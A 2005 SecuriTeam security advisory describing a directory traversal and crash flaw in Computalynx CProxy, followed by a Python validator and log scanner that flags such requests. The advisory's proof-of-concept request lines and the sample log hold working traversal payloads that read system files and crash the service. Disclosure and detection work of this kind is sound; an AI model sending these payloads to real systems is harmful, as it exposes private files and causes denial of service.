[NT] Directory Traversal In CProxy
From: SecuriTeam (support_at_securiteam.com)
Date: 03/07/05
To: list@securiteam.com
Date: 7 Mar 2005 10:35:33 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Directory Traversal In CProxy
------------------------------------------------------------------------
SUMMARY
<http://www.computalynx.com/> CProxy is a Windows-based (95/98, NT4 and
2000) software solution that provides a single point of contact between
your network and the Internet.

Because of inadequate input validation, a malicious attacker can perform a
directory traversal attack and thus gain access to arbitrary files located
on the CProxy Server system. Using the same attack vector with specially
crafted HTTP requests, it is possible to crash the CProxy service running
on the remote system.
DETAILS
Vulnerable Systems:
* Computalynx CProxy 3.3 family for Win32.
* Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32.
When performing proxy functions, CProxy Server is vulnerable to a
directory traversal attack. Inadequate input validation and filtering
allows a remote attacker to gain access to arbitrary files on the Windows
system on which the CProxy Server software has been deployed: the proxy
fails to filter directory traversal sequences out of the requested URL and
consequently opens arbitrary local files in response to proxy requests. A
specially crafted URL allows arbitrary files to be retrieved from the
system. The retrieval of system files can compromise the entire system or
expose it to further avenues of attack. A malicious attacker can perform a
request using the following format to gain access to arbitrary data.
GET http://

Proof of concept:
An attacker can gain access to a file in the WINNT directory as shown in
the following example, by connecting to CProxy Server's proxy service
(listening on TCP port 8080 by default) and performing a request:

[user@host ~]$ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

HTTP/1.0 200 OK
Content-length: 734
Date: Sat, 19 Feb 2005 21:09:58 GMT
Date: Sat, 19 Feb 2005 21:09:58 GMT

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
Connection closed by foreign host.

Retrieving an arbitrary ASCII file using the "GET" method causes the file
to be displayed and immediately afterwards causes the CProxy Server
service to crash with an error message indicating that "memory could not
be read". However, retrieving the same ASCII file using the "POST" or
"HEAD" method causes the file contents to be displayed without crashing
the CProxy Server service, allowing an attacker to execute multiple
requests and thus retrieve various arbitrary files from the CProxy Server
system.

Proof of concept:
"POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
"GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

Attempting to retrieve an executable file using any of these HTTP methods
("GET", "HEAD", or "POST") in the aforementioned manner causes the
contents of the executable file to be displayed and the CProxy Server
service to crash with an error message of "memory could not be read",
rendering the service unavailable and thus resulting in a
Denial-of-Service condition.

Proof of concept:
"GET http://../../../../../winnt/system32/cmd.exe"
"POST http://../../../../../winnt/system32/cmd.exe"

Disclosure Timeline:
19/02/2005 - Computalynx contacted regarding this issue.
02/03/2005 - At present, the vendor has not replied regarding this issue.

ADDITIONAL INFORMATION
The information has been provided by
<mailto:kristof.philipsen@ubizen.com> Kristof Philipsen.

========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
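The request lines quoted in the proofs of concept above are absolute-form proxy targets whose authority component is "..", which CProxy evidently treated as the start of a local path. As an added example, not code from the advisory or from CProxy, the following Python validator shows the check a forward proxy (or a log-review script) should apply to such a request line before opening anything: it rejects a non-hostname authority, a dot-dot segment in the percent-decoded path and backslashes, and accepts an ordinary target in canonical form. The function names, the hostname rule and the access-log lines are assumptions constructed for this example; the log format is not CProxy's.

```python
"""Validator for absolute-form HTTP proxy request lines.

Added example, not CProxy's code: the advisory shows that CProxy accepted
"GET http://../../../../../winnt/..." and opened the traversal path as a
local file.  This module checks a request line before a proxy acts on it.
Function names, the hostname rule and the sample log lines are assumptions.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# RFC 1123 hostname (dotted IPv4 matches too) with an optional :port.
# Userinfo ("user@host") and IPv6 literals are deliberately not accepted.
_HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$",
    re.IGNORECASE,
)
_ALLOWED_METHODS = {"GET", "HEAD", "POST"}


def validate_proxy_target(request_line):
    """Check one request line of the form "METHOD absolute-URI [HTTP/x.y]".

    Returns (ok, detail): on success detail is the canonical "host/path"
    the proxy may forward, on failure the first reason for rejection.
    """
    parts = request_line.strip().split()
    if len(parts) not in (2, 3):        # HTTP/0.9-style lines carry no version
        return False, "malformed request line"
    method, target = parts[0].upper(), parts[1]
    if method not in _ALLOWED_METHODS:
        return False, "method %s not allowed" % method
    url = urlsplit(target)
    if url.scheme.lower() not in ("http", "https"):
        return False, "target is not an absolute http(s) URL"
    # The authority must be a real hostname.  In the advisory it was "..",
    # which the proxy glued onto a local path instead of resolving.
    if not _HOST_RE.match(url.netloc):
        return False, "invalid host %r" % url.netloc
    # Percent-decode before inspecting so %2e%2e or %5c cannot hide traversal.
    path = unquote(url.path) or "/"
    if "\\" in path or "\x00" in path:
        return False, "backslash or NUL in path"
    if ".." in path.split("/"):
        return False, "dot-dot segment in path"
    canonical = posixpath.normpath(path)  # collapses "." and "//" only
    if not canonical.startswith("/"):
        return False, "path escapes root after normalization"
    return True, url.netloc.lower() + canonical


_QUOTED_REQUEST = re.compile(r'"([^"]*)"')


def flag_traversal_in_log(lines):
    """Run the validator over access-log lines; return [(line_no, reason)]."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _QUOTED_REQUEST.search(line)
        if match:
            ok, detail = validate_proxy_target(match.group(1))
            if not ok:
                hits.append((number, detail))
    return hits


# Constructed sample log (assumed common-log-style format, not CProxy's);
# lines 2 and 4 reuse the advisory's proof-of-concept request lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Feb/2005:21:09:40 +0000] "GET http://www.example.com/ HTTP/1.0" 200 1203',
    '10.0.0.5 - - [19/Feb/2005:21:09:58 +0000] "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0" 200 734',
    '10.0.0.5 - - [19/Feb/2005:21:10:03 +0000] "GET http://10.0.0.1:8080/a/%2e%2e/%2e%2e/boot.ini HTTP/1.1" 200 301',
    '10.0.0.5 - - [19/Feb/2005:21:10:20 +0000] "POST http://../../../../../winnt/system32/cmd.exe" 200 0',
]

if __name__ == "__main__":
    for number, reason in flag_traversal_in_log(SAMPLE_LOG):
        print("log line %d: %s" % (number, reason))
```

The authority check is what matters for this advisory: a proxy that resolves the host before touching any path can never turn "http://.." into a local file. The decoded-path check and the backslash rule are the usual companions on a Windows target, where "%2e%2e" and "\" would otherwise survive a naive string filter for "../".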